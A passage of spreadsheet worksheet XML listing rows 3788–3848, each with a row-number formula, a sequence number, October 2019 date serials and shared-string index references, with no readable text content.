    <row r="3788" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3788">
        <f t="shared" si="59"/>
        <v>3787</v>
      </c>
      <c r="B3788">
        <v>3787</v>
      </c>
      <c r="C3788" t="s">
        <v>3</v>
      </c>
      <c r="D3788" s="1">
        <v>43749</v>
      </c>
      <c r="E3788" t="s">
        <v>7558</v>
      </c>
      <c r="F3788" t="s">
        <v>10021</v>
      </c>
      <c r="G3788" t="s">
        <v>7559</v>
      </c>
    </row>
    <row r="3789" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3789">
        <f t="shared" si="59"/>
        <v>3788</v>
      </c>
      <c r="B3789">
        <v>3788</v>
      </c>
      <c r="C3789" t="s">
        <v>3</v>
      </c>
      <c r="D3789" s="1">
        <v>43757</v>
      </c>
      <c r="E3789" t="s">
        <v>7560</v>
      </c>
      <c r="F3789" t="s">
        <v>9975</v>
      </c>
      <c r="G3789" t="s">
        <v>7561</v>
      </c>
    </row>
    <row r="3790" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3790">
        <f t="shared" si="59"/>
        <v>3789</v>
      </c>
      <c r="B3790">
        <v>3789</v>
      </c>
      <c r="C3790" t="s">
        <v>3</v>
      </c>
      <c r="D3790" s="1">
        <v>43753</v>
      </c>
      <c r="E3790" t="s">
        <v>7562</v>
      </c>
      <c r="F3790" t="s">
        <v>9975</v>
      </c>
      <c r="G3790" t="s">
        <v>7563</v>
      </c>
    </row>
    <row r="3791" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3791">
        <f t="shared" si="59"/>
        <v>3790</v>
      </c>
      <c r="B3791">
        <v>3790</v>
      </c>
      <c r="C3791" t="s">
        <v>3</v>
      </c>
      <c r="D3791" s="1">
        <v>43752</v>
      </c>
      <c r="E3791" t="s">
        <v>7564</v>
      </c>
      <c r="F3791" t="s">
        <v>10021</v>
      </c>
      <c r="G3791" t="s">
        <v>7565</v>
      </c>
    </row>
    <row r="3792" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3792">
        <f t="shared" si="59"/>
        <v>3791</v>
      </c>
      <c r="B3792">
        <v>3791</v>
      </c>
      <c r="C3792" t="s">
        <v>3</v>
      </c>
      <c r="D3792" s="1">
        <v>43757</v>
      </c>
      <c r="E3792" t="s">
        <v>7566</v>
      </c>
      <c r="F3792" t="s">
        <v>9975</v>
      </c>
      <c r="G3792" t="s">
        <v>7567</v>
      </c>
    </row>
    <row r="3793" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3793">
        <f t="shared" si="59"/>
        <v>3792</v>
      </c>
      <c r="B3793">
        <v>3792</v>
      </c>
      <c r="C3793" t="s">
        <v>3</v>
      </c>
      <c r="D3793" s="1">
        <v>43756</v>
      </c>
      <c r="E3793" t="s">
        <v>7568</v>
      </c>
      <c r="F3793" t="s">
        <v>9975</v>
      </c>
      <c r="G3793" t="s">
        <v>7569</v>
      </c>
    </row>
    <row r="3794" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3794">
        <f t="shared" si="59"/>
        <v>3793</v>
      </c>
      <c r="B3794">
        <v>3793</v>
      </c>
      <c r="C3794" t="s">
        <v>3</v>
      </c>
      <c r="D3794" s="1">
        <v>43756</v>
      </c>
      <c r="E3794" t="s">
        <v>7570</v>
      </c>
      <c r="F3794" t="s">
        <v>9975</v>
      </c>
      <c r="G3794" t="s">
        <v>7571</v>
      </c>
    </row>
    <row r="3795" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3795">
        <f t="shared" si="59"/>
        <v>3794</v>
      </c>
      <c r="B3795">
        <v>3794</v>
      </c>
      <c r="C3795" t="s">
        <v>3</v>
      </c>
      <c r="D3795" s="1">
        <v>43741</v>
      </c>
      <c r="E3795" t="s">
        <v>7572</v>
      </c>
      <c r="F3795" t="s">
        <v>10021</v>
      </c>
      <c r="G3795" t="s">
        <v>7573</v>
      </c>
    </row>
    <row r="3796" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3796">
        <f t="shared" si="59"/>
        <v>3795</v>
      </c>
      <c r="B3796">
        <v>3795</v>
      </c>
      <c r="C3796" t="s">
        <v>3</v>
      </c>
      <c r="D3796" s="1">
        <v>43743</v>
      </c>
      <c r="E3796" t="s">
        <v>7574</v>
      </c>
      <c r="F3796" t="s">
        <v>9975</v>
      </c>
      <c r="G3796" t="s">
        <v>7575</v>
      </c>
    </row>
    <row r="3797" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3797">
        <f t="shared" si="59"/>
        <v>3796</v>
      </c>
      <c r="B3797">
        <v>3796</v>
      </c>
      <c r="C3797" t="s">
        <v>3</v>
      </c>
      <c r="D3797" s="1">
        <v>43756</v>
      </c>
      <c r="E3797" t="s">
        <v>7576</v>
      </c>
      <c r="F3797" t="s">
        <v>9975</v>
      </c>
      <c r="G3797" t="s">
        <v>7577</v>
      </c>
    </row>
    <row r="3798" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3798">
        <f t="shared" si="59"/>
        <v>3797</v>
      </c>
      <c r="B3798">
        <v>3797</v>
      </c>
      <c r="C3798" t="s">
        <v>3</v>
      </c>
      <c r="D3798" s="1">
        <v>43745</v>
      </c>
      <c r="E3798" t="s">
        <v>7578</v>
      </c>
      <c r="F3798" t="s">
        <v>9975</v>
      </c>
      <c r="G3798" t="s">
        <v>7579</v>
      </c>
    </row>
    <row r="3799" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3799">
        <f t="shared" si="59"/>
        <v>3798</v>
      </c>
      <c r="B3799">
        <v>3798</v>
      </c>
      <c r="C3799" t="s">
        <v>3</v>
      </c>
      <c r="D3799" s="1">
        <v>43745</v>
      </c>
      <c r="E3799" t="s">
        <v>7580</v>
      </c>
      <c r="F3799" t="s">
        <v>9975</v>
      </c>
      <c r="G3799" t="s">
        <v>7581</v>
      </c>
    </row>
    <row r="3800" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3800">
        <f t="shared" si="59"/>
        <v>3799</v>
      </c>
      <c r="B3800">
        <v>3799</v>
      </c>
      <c r="C3800" t="s">
        <v>3</v>
      </c>
      <c r="D3800" s="1">
        <v>43742</v>
      </c>
      <c r="E3800" t="s">
        <v>7582</v>
      </c>
      <c r="F3800" t="s">
        <v>9975</v>
      </c>
      <c r="G3800" t="s">
        <v>7583</v>
      </c>
    </row>
    <row r="3801" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3801">
        <f t="shared" si="59"/>
        <v>3800</v>
      </c>
      <c r="B3801">
        <v>3800</v>
      </c>
      <c r="C3801" t="s">
        <v>3</v>
      </c>
      <c r="D3801" s="1">
        <v>43752</v>
      </c>
      <c r="E3801" t="s">
        <v>7584</v>
      </c>
      <c r="F3801" t="s">
        <v>9975</v>
      </c>
      <c r="G3801" t="s">
        <v>7585</v>
      </c>
    </row>
    <row r="3802" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3802">
        <f t="shared" si="59"/>
        <v>3801</v>
      </c>
      <c r="B3802">
        <v>3801</v>
      </c>
      <c r="C3802" t="s">
        <v>3</v>
      </c>
      <c r="D3802" s="1">
        <v>43751</v>
      </c>
      <c r="E3802" t="s">
        <v>7586</v>
      </c>
      <c r="F3802" t="s">
        <v>9975</v>
      </c>
      <c r="G3802" t="s">
        <v>7587</v>
      </c>
    </row>
    <row r="3803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3803">
        <f t="shared" si="59"/>
        <v>3802</v>
      </c>
      <c r="B3803">
        <v>3802</v>
      </c>
      <c r="C3803" t="s">
        <v>3</v>
      </c>
      <c r="D3803" s="1">
        <v>43748</v>
      </c>
      <c r="E3803" t="s">
        <v>7588</v>
      </c>
      <c r="F3803" t="s">
        <v>9975</v>
      </c>
      <c r="G3803" t="s">
        <v>7589</v>
      </c>
    </row>
    <row r="3804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3804">
        <f t="shared" si="59"/>
        <v>3803</v>
      </c>
      <c r="B3804">
        <v>3803</v>
      </c>
      <c r="C3804" t="s">
        <v>3</v>
      </c>
      <c r="D3804" s="1">
        <v>43745</v>
      </c>
      <c r="E3804" t="s">
        <v>7590</v>
      </c>
      <c r="F3804" t="s">
        <v>10021</v>
      </c>
      <c r="G3804" t="s">
        <v>7591</v>
      </c>
    </row>
    <row r="3805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3805">
        <f t="shared" si="59"/>
        <v>3804</v>
      </c>
      <c r="B3805">
        <v>3804</v>
      </c>
      <c r="C3805" t="s">
        <v>3</v>
      </c>
      <c r="D3805" s="1">
        <v>43753</v>
      </c>
      <c r="E3805" t="s">
        <v>7592</v>
      </c>
      <c r="F3805" t="s">
        <v>10021</v>
      </c>
      <c r="G3805" t="s">
        <v>7593</v>
      </c>
    </row>
    <row r="3806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3806">
        <f t="shared" si="59"/>
        <v>3805</v>
      </c>
      <c r="B3806">
        <v>3805</v>
      </c>
      <c r="C3806" t="s">
        <v>3</v>
      </c>
      <c r="D3806" s="1">
        <v>43741</v>
      </c>
      <c r="E3806" t="s">
        <v>7594</v>
      </c>
      <c r="F3806" t="s">
        <v>9978</v>
      </c>
      <c r="G3806" t="s">
        <v>7595</v>
      </c>
    </row>
    <row r="3807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3807">
        <f t="shared" si="59"/>
        <v>3806</v>
      </c>
      <c r="B3807">
        <v>3806</v>
      </c>
      <c r="C3807" t="s">
        <v>3</v>
      </c>
      <c r="D3807" s="1">
        <v>43743</v>
      </c>
      <c r="E3807" t="s">
        <v>7596</v>
      </c>
      <c r="F3807" t="s">
        <v>10526</v>
      </c>
      <c r="G3807" t="s">
        <v>7597</v>
      </c>
    </row>
    <row r="3808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3808">
        <f t="shared" si="59"/>
        <v>3807</v>
      </c>
      <c r="B3808">
        <v>3807</v>
      </c>
      <c r="C3808" t="s">
        <v>3</v>
      </c>
      <c r="D3808" s="1">
        <v>43750</v>
      </c>
      <c r="E3808" t="s">
        <v>7598</v>
      </c>
      <c r="F3808" t="s">
        <v>9975</v>
      </c>
      <c r="G3808" t="s">
        <v>7599</v>
      </c>
    </row>
    <row r="3809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3809">
        <f t="shared" si="59"/>
        <v>3808</v>
      </c>
      <c r="B3809">
        <v>3808</v>
      </c>
      <c r="C3809" t="s">
        <v>3</v>
      </c>
      <c r="D3809" s="1">
        <v>43747</v>
      </c>
      <c r="E3809" t="s">
        <v>7600</v>
      </c>
      <c r="F3809" t="s">
        <v>9975</v>
      </c>
      <c r="G3809" t="s">
        <v>7601</v>
      </c>
    </row>
    <row r="3810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3810">
        <f t="shared" si="59"/>
        <v>3809</v>
      </c>
      <c r="B3810">
        <v>3809</v>
      </c>
      <c r="C3810" t="s">
        <v>3</v>
      </c>
      <c r="D3810" s="1">
        <v>43744</v>
      </c>
      <c r="E3810" t="s">
        <v>7602</v>
      </c>
      <c r="F3810" t="s">
        <v>9975</v>
      </c>
      <c r="G3810" t="s">
        <v>7603</v>
      </c>
    </row>
    <row r="3811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3811">
        <f t="shared" si="59"/>
        <v>3810</v>
      </c>
      <c r="B3811">
        <v>3810</v>
      </c>
      <c r="C3811" t="s">
        <v>3</v>
      </c>
      <c r="D3811" s="1">
        <v>43754</v>
      </c>
      <c r="E3811" t="s">
        <v>7604</v>
      </c>
      <c r="F3811" t="s">
        <v>9975</v>
      </c>
      <c r="G3811" t="s">
        <v>7605</v>
      </c>
    </row>
    <row r="3812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3812">
        <f t="shared" si="59"/>
        <v>3811</v>
      </c>
      <c r="B3812">
        <v>3811</v>
      </c>
      <c r="C3812" t="s">
        <v>3</v>
      </c>
      <c r="D3812" s="1">
        <v>43755</v>
      </c>
      <c r="E3812" t="s">
        <v>7606</v>
      </c>
      <c r="F3812" t="s">
        <v>10021</v>
      </c>
      <c r="G3812" t="s">
        <v>7607</v>
      </c>
    </row>
    <row r="3813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3813">
        <f t="shared" si="59"/>
        <v>3812</v>
      </c>
      <c r="B3813">
        <v>3812</v>
      </c>
      <c r="C3813" t="s">
        <v>3</v>
      </c>
      <c r="D3813" s="1">
        <v>43744</v>
      </c>
      <c r="E3813" t="s">
        <v>7608</v>
      </c>
      <c r="F3813" t="s">
        <v>9975</v>
      </c>
      <c r="G3813" t="s">
        <v>7609</v>
      </c>
    </row>
    <row r="3814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3814">
        <f t="shared" si="59"/>
        <v>3813</v>
      </c>
      <c r="B3814">
        <v>3813</v>
      </c>
      <c r="C3814" t="s">
        <v>3</v>
      </c>
      <c r="D3814" s="1">
        <v>43740</v>
      </c>
      <c r="E3814" t="s">
        <v>7610</v>
      </c>
      <c r="F3814" t="s">
        <v>9975</v>
      </c>
      <c r="G3814" t="s">
        <v>7611</v>
      </c>
    </row>
    <row r="3815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3815">
        <f t="shared" si="59"/>
        <v>3814</v>
      </c>
      <c r="B3815">
        <v>3814</v>
      </c>
      <c r="C3815" t="s">
        <v>3</v>
      </c>
      <c r="D3815" s="1">
        <v>43754</v>
      </c>
      <c r="E3815" t="s">
        <v>7612</v>
      </c>
      <c r="F3815" t="s">
        <v>9975</v>
      </c>
      <c r="G3815" t="s">
        <v>7613</v>
      </c>
    </row>
    <row r="3816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3816">
        <f t="shared" si="59"/>
        <v>3815</v>
      </c>
      <c r="B3816">
        <v>3815</v>
      </c>
      <c r="C3816" t="s">
        <v>3</v>
      </c>
      <c r="D3816" s="1">
        <v>43739</v>
      </c>
      <c r="E3816" t="s">
        <v>7614</v>
      </c>
      <c r="F3816" t="s">
        <v>9975</v>
      </c>
      <c r="G3816" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="3817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3817">
        <f t="shared" si="59"/>
        <v>3816</v>
      </c>
      <c r="B3817">
        <v>3816</v>
      </c>
      <c r="C3817" t="s">
        <v>3</v>
      </c>
      <c r="D3817" s="1">
        <v>43742</v>
      </c>
      <c r="E3817" t="s">
        <v>7616</v>
      </c>
      <c r="F3817" t="s">
        <v>9975</v>
      </c>
      <c r="G3817" t="s">
        <v>7617</v>
      </c>
    </row>
    <row r="3818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3818">
        <f t="shared" si="59"/>
        <v>3817</v>
      </c>
      <c r="B3818">
        <v>3817</v>
      </c>
      <c r="C3818" t="s">
        <v>3</v>
      </c>
      <c r="D3818" s="1">
        <v>43746</v>
      </c>
      <c r="E3818" t="s">
        <v>7618</v>
      </c>
      <c r="F3818" t="s">
        <v>9975</v>
      </c>
      <c r="G3818" t="s">
        <v>7619</v>
      </c>
    </row>
    <row r="3819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3819">
        <f t="shared" si="59"/>
        <v>3818</v>
      </c>
      <c r="B3819">
        <v>3818</v>
      </c>
      <c r="C3819" t="s">
        <v>3</v>
      </c>
      <c r="D3819" s="1">
        <v>43745</v>
      </c>
      <c r="E3819" t="s">
        <v>7620</v>
      </c>
      <c r="F3819" t="s">
        <v>9975</v>
      </c>
      <c r="G3819" t="s">
        <v>7621</v>
      </c>
    </row>
    <row r="3820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3820">
        <f t="shared" si="59"/>
        <v>3819</v>
      </c>
      <c r="B3820">
        <v>3819</v>
      </c>
      <c r="C3820" t="s">
        <v>3</v>
      </c>
      <c r="D3820" s="1">
        <v>43749</v>
      </c>
      <c r="E3820" t="s">
        <v>7622</v>
      </c>
      <c r="F3820" t="s">
        <v>10021</v>
      </c>
      <c r="G3820" t="s">
        <v>7623</v>
      </c>
    </row>
    <row r="3821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3821">
        <f t="shared" si="59"/>
        <v>3820</v>
      </c>
      <c r="B3821">
        <v>3820</v>
      </c>
      <c r="C3821" t="s">
        <v>3</v>
      </c>
      <c r="D3821" s="1">
        <v>43754</v>
      </c>
      <c r="E3821" t="s">
        <v>7624</v>
      </c>
      <c r="F3821" t="s">
        <v>9975</v>
      </c>
      <c r="G3821" t="s">
        <v>7625</v>
      </c>
    </row>
    <row r="3822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3822">
        <f t="shared" si="59"/>
        <v>3821</v>
      </c>
      <c r="B3822">
        <v>3821</v>
      </c>
      <c r="C3822" t="s">
        <v>3</v>
      </c>
      <c r="D3822" s="1">
        <v>43741</v>
      </c>
      <c r="E3822" t="s">
        <v>7626</v>
      </c>
      <c r="F3822" t="s">
        <v>9975</v>
      </c>
      <c r="G3822" t="s">
        <v>7627</v>
      </c>
    </row>
    <row r="3823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3823">
        <f t="shared" si="59"/>
        <v>3822</v>
      </c>
      <c r="B3823">
        <v>3822</v>
      </c>
      <c r="C3823" t="s">
        <v>3</v>
      </c>
      <c r="D3823" s="1">
        <v>43743</v>
      </c>
      <c r="E3823" t="s">
        <v>7628</v>
      </c>
      <c r="F3823" t="s">
        <v>9975</v>
      </c>
      <c r="G3823" t="s">
        <v>7629</v>
      </c>
    </row>
    <row r="3824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3824">
        <f t="shared" si="59"/>
        <v>3823</v>
      </c>
      <c r="B3824">
        <v>3823</v>
      </c>
      <c r="C3824" t="s">
        <v>3</v>
      </c>
      <c r="D3824" s="1">
        <v>43751</v>
      </c>
      <c r="E3824" t="s">
        <v>7630</v>
      </c>
      <c r="F3824" t="s">
        <v>9975</v>
      </c>
      <c r="G3824" t="s">
        <v>7631</v>
      </c>
    </row>
    <row r="3825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3825">
        <f t="shared" si="59"/>
        <v>3824</v>
      </c>
      <c r="B3825">
        <v>3824</v>
      </c>
      <c r="C3825" t="s">
        <v>3</v>
      </c>
      <c r="D3825" s="1">
        <v>43749</v>
      </c>
      <c r="E3825" t="s">
        <v>7632</v>
      </c>
      <c r="F3825" t="s">
        <v>9975</v>
      </c>
      <c r="G3825" t="s">
        <v>7633</v>
      </c>
    </row>
    <row r="3826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3826">
        <f t="shared" si="59"/>
        <v>3825</v>
      </c>
      <c r="B3826">
        <v>3825</v>
      </c>
      <c r="C3826" t="s">
        <v>3</v>
      </c>
      <c r="D3826" s="1">
        <v>43740</v>
      </c>
      <c r="E3826" t="s">
        <v>7634</v>
      </c>
      <c r="F3826" t="s">
        <v>9975</v>
      </c>
      <c r="G3826" t="s">
        <v>7635</v>
      </c>
    </row>
    <row r="3827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3827">
        <f t="shared" si="59"/>
        <v>3826</v>
      </c>
      <c r="B3827">
        <v>3826</v>
      </c>
      <c r="C3827" t="s">
        <v>3</v>
      </c>
      <c r="D3827" s="1">
        <v>43752</v>
      </c>
      <c r="E3827" t="s">
        <v>7636</v>
      </c>
      <c r="F3827" t="s">
        <v>10021</v>
      </c>
      <c r="G3827" t="s">
        <v>7637</v>
      </c>
    </row>
    <row r="3828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3828">
        <f t="shared" si="59"/>
        <v>3827</v>
      </c>
      <c r="B3828">
        <v>3827</v>
      </c>
      <c r="C3828" t="s">
        <v>3</v>
      </c>
      <c r="D3828" s="1">
        <v>43750</v>
      </c>
      <c r="E3828" t="s">
        <v>7638</v>
      </c>
      <c r="F3828" t="s">
        <v>10021</v>
      </c>
      <c r="G3828" t="s">
        <v>7639</v>
      </c>
    </row>
    <row r="3829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3829">
        <f t="shared" si="59"/>
        <v>3828</v>
      </c>
      <c r="B3829">
        <v>3828</v>
      </c>
      <c r="C3829" t="s">
        <v>3</v>
      </c>
      <c r="D3829" s="1">
        <v>43739</v>
      </c>
      <c r="E3829" t="s">
        <v>7640</v>
      </c>
      <c r="F3829" t="s">
        <v>9975</v>
      </c>
      <c r="G3829" t="s">
        <v>7641</v>
      </c>
    </row>
    <row r="3830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3830">
        <f t="shared" si="59"/>
        <v>3829</v>
      </c>
      <c r="B3830">
        <v>3829</v>
      </c>
      <c r="C3830" t="s">
        <v>3</v>
      </c>
      <c r="D3830" s="1">
        <v>43745</v>
      </c>
      <c r="E3830" t="s">
        <v>7642</v>
      </c>
      <c r="F3830" t="s">
        <v>9978</v>
      </c>
      <c r="G3830" t="s">
        <v>7643</v>
      </c>
    </row>
    <row r="3831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3831">
        <f t="shared" si="59"/>
        <v>3830</v>
      </c>
      <c r="B3831">
        <v>3830</v>
      </c>
      <c r="C3831" t="s">
        <v>3</v>
      </c>
      <c r="D3831" s="1">
        <v>43744</v>
      </c>
      <c r="E3831" t="s">
        <v>7644</v>
      </c>
      <c r="F3831" t="s">
        <v>10021</v>
      </c>
      <c r="G3831" t="s">
        <v>7645</v>
      </c>
    </row>
    <row r="3832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3832">
        <f t="shared" si="59"/>
        <v>3831</v>
      </c>
      <c r="B3832">
        <v>3831</v>
      </c>
      <c r="C3832" t="s">
        <v>3</v>
      </c>
      <c r="D3832" s="1">
        <v>43757</v>
      </c>
      <c r="E3832" t="s">
        <v>7646</v>
      </c>
      <c r="F3832" t="s">
        <v>9975</v>
      </c>
      <c r="G3832" t="s">
        <v>7647</v>
      </c>
    </row>
    <row r="3833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3833">
        <f t="shared" si="59"/>
        <v>3832</v>
      </c>
      <c r="B3833">
        <v>3832</v>
      </c>
      <c r="C3833" t="s">
        <v>3</v>
      </c>
      <c r="D3833" s="1">
        <v>43751</v>
      </c>
      <c r="E3833" t="s">
        <v>7648</v>
      </c>
      <c r="F3833" t="s">
        <v>9978</v>
      </c>
      <c r="G3833" t="s">
        <v>7649</v>
      </c>
    </row>
    <row r="3834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3834">
        <f t="shared" si="59"/>
        <v>3833</v>
      </c>
      <c r="B3834">
        <v>3833</v>
      </c>
      <c r="C3834" t="s">
        <v>3</v>
      </c>
      <c r="D3834" s="1">
        <v>43754</v>
      </c>
      <c r="E3834" t="s">
        <v>7650</v>
      </c>
      <c r="F3834" t="s">
        <v>9975</v>
      </c>
      <c r="G3834" t="s">
        <v>7651</v>
      </c>
    </row>
    <row r="3835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3835">
        <f t="shared" si="59"/>
        <v>3834</v>
      </c>
      <c r="B3835">
        <v>3834</v>
      </c>
      <c r="C3835" t="s">
        <v>3</v>
      </c>
      <c r="D3835" s="1">
        <v>43746</v>
      </c>
      <c r="E3835" t="s">
        <v>7652</v>
      </c>
      <c r="F3835" t="s">
        <v>9975</v>
      </c>
      <c r="G3835" t="s">
        <v>7653</v>
      </c>
    </row>
    <row r="3836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3836">
        <f t="shared" si="59"/>
        <v>3835</v>
      </c>
      <c r="B3836">
        <v>3835</v>
      </c>
      <c r="C3836" t="s">
        <v>3</v>
      </c>
      <c r="D3836" s="1">
        <v>43740</v>
      </c>
      <c r="E3836" t="s">
        <v>7654</v>
      </c>
      <c r="F3836" t="s">
        <v>9975</v>
      </c>
      <c r="G3836" t="s">
        <v>7655</v>
      </c>
    </row>
    <row r="3837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3837">
        <f t="shared" si="59"/>
        <v>3836</v>
      </c>
      <c r="B3837">
        <v>3836</v>
      </c>
      <c r="C3837" t="s">
        <v>3</v>
      </c>
      <c r="D3837" s="1">
        <v>43739</v>
      </c>
      <c r="E3837" t="s">
        <v>7656</v>
      </c>
      <c r="F3837" t="s">
        <v>9975</v>
      </c>
      <c r="G3837" t="s">
        <v>7657</v>
      </c>
    </row>
    <row r="3838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3838">
        <f t="shared" si="59"/>
        <v>3837</v>
      </c>
      <c r="B3838">
        <v>3837</v>
      </c>
      <c r="C3838" t="s">
        <v>3</v>
      </c>
      <c r="D3838" s="1">
        <v>43753</v>
      </c>
      <c r="E3838" t="s">
        <v>7658</v>
      </c>
      <c r="F3838" t="s">
        <v>9975</v>
      </c>
      <c r="G3838" t="s">
        <v>7659</v>
      </c>
    </row>
    <row r="3839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3839">
        <f t="shared" si="59"/>
        <v>3838</v>
      </c>
      <c r="B3839">
        <v>3838</v>
      </c>
      <c r="C3839" t="s">
        <v>3</v>
      </c>
      <c r="D3839" s="1">
        <v>43756</v>
      </c>
      <c r="E3839" t="s">
        <v>7660</v>
      </c>
      <c r="F3839" t="s">
        <v>10021</v>
      </c>
      <c r="G3839" t="s">
        <v>7661</v>
      </c>
    </row>
    <row r="3840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3840">
        <f t="shared" si="59"/>
        <v>3839</v>
      </c>
      <c r="B3840">
        <v>3839</v>
      </c>
      <c r="C3840" t="s">
        <v>3</v>
      </c>
      <c r="D3840" s="1">
        <v>43756</v>
      </c>
      <c r="E3840" t="s">
        <v>7662</v>
      </c>
      <c r="F3840" t="s">
        <v>9975</v>
      </c>
      <c r="G3840" t="s">
        <v>7663</v>
      </c>
    </row>
    <row r="3841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3841">
        <f t="shared" si="59"/>
        <v>3840</v>
      </c>
      <c r="B3841">
        <v>3840</v>
      </c>
      <c r="C3841" t="s">
        <v>3</v>
      </c>
      <c r="D3841" s="1">
        <v>43741</v>
      </c>
      <c r="E3841" t="s">
        <v>7664</v>
      </c>
      <c r="F3841" t="s">
        <v>9975</v>
      </c>
      <c r="G3841" t="s">
        <v>7665</v>
      </c>
    </row>
    <row r="3842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3842">
        <f t="shared" si="59"/>
        <v>3841</v>
      </c>
      <c r="B3842">
        <v>3841</v>
      </c>
      <c r="C3842" t="s">
        <v>3</v>
      </c>
      <c r="D3842" s="1">
        <v>43752</v>
      </c>
      <c r="E3842" t="s">
        <v>7666</v>
      </c>
      <c r="F3842" t="s">
        <v>9975</v>
      </c>
      <c r="G3842" t="s">
        <v>7667</v>
      </c>
    </row>
    <row r="3843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3843">
        <f t="shared" ref="A3843:A3906" si="60">+ROW(A3842)</f>
        <v>3842</v>
      </c>
      <c r="B3843">
        <v>3842</v>
      </c>
      <c r="C3843" t="s">
        <v>3</v>
      </c>
      <c r="D3843" s="1">
        <v>43745</v>
      </c>
      <c r="E3843" t="s">
        <v>7668</v>
      </c>
      <c r="F3843" t="s">
        <v>9975</v>
      </c>
      <c r="G3843" t="s">
        <v>7669</v>
      </c>
    </row>
    <row r="3844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3844">
        <f t="shared" si="60"/>
        <v>3843</v>
      </c>
      <c r="B3844">
        <v>3843</v>
      </c>
      <c r="C3844" t="s">
        <v>3</v>
      </c>
      <c r="D3844" s="1">
        <v>43751</v>
      </c>
      <c r="E3844" t="s">
        <v>7670</v>
      </c>
      <c r="F3844" t="s">
        <v>10021</v>
      </c>
      <c r="G3844" t="s">
        <v>7671</v>
      </c>
    </row>
    <row r="3845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3845">
        <f t="shared" si="60"/>
        <v>3844</v>
      </c>
      <c r="B3845">
        <v>3844</v>
      </c>
      <c r="C3845" t="s">
        <v>3</v>
      </c>
      <c r="D3845" s="1">
        <v>43745</v>
      </c>
      <c r="E3845" t="s">
        <v>7672</v>
      </c>
      <c r="F3845" t="s">
        <v>10021</v>
      </c>
      <c r="G3845" t="s">
        <v>7673</v>
      </c>
    </row>
    <row r="3846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3846">
        <f t="shared" si="60"/>
        <v>3845</v>
      </c>
      <c r="B3846">
        <v>3845</v>
      </c>
      <c r="C3846" t="s">
        <v>3</v>
      </c>
      <c r="D3846" s="1">
        <v>43757</v>
      </c>
      <c r="E3846" t="s">
        <v>7674</v>
      </c>
      <c r="F3846" t="s">
        <v>9975</v>
      </c>
      <c r="G3846" t="s">
        <v>7675</v>
      </c>
    </row>
    <row r="3847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3847">
        <f t="shared" si="60"/>
        <v>3846</v>
      </c>
      <c r="B3847">
        <v>3846</v>
      </c>
      <c r="C3847" t="s">
        <v>3</v>
      </c>
      <c r="D3847" s="1">
        <v>43751</v>
      </c>
      <c r="E3847" t="s">
        <v>7676</v>
      </c>
      <c r="F3847" t="s">
        <v>9975</v>
      </c>
      <c r="G3847" t="s">
        <v>7677</v>
      </c>
    </row>
    <row r="3848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3848">
        <f t="shared" si="60"/>
        <v>3847</v>
      </c>
      <c r="B3848">
        <v>3847</v>
      </c>
      <c r="C3848" t="s">
        <v>3</v>
      </c>
      <c r="D3848" s="1">
        <v>43739</v>
      </c>
      <c r="E3848" t="s">
        <v>7678</v>
      </c>
      <c r="F3848" t="s">
        <v>9975</v>
      </c>
      <c r="G3848" t="s">
        <v>7679</v>
      </c>
    </row>
    <row r="3849" spans="1:7" x14ac:dyDescent="0.35">
